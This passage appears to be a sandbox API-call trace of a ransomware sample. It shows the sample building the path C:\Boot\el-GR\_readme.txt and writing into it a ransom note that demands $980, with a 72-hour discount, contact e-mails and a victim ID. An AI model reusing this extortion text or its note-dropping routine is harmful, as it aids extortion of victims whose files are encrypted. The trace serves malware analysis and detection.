dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.708] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0142.708] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.708] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.708] PathFindFileNameW (pszPath="") returned="" [0142.708] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.709] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.709] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.709] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.709] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0142.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.709] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0142.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.709] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.709] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.709] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.710] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.710] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.711] CloseHandle (hObject=0x6f0) returned 1 [0142.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.711] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.711] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.712] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.712] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a8ea10, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.712] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a8ea10, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.712] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.712] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 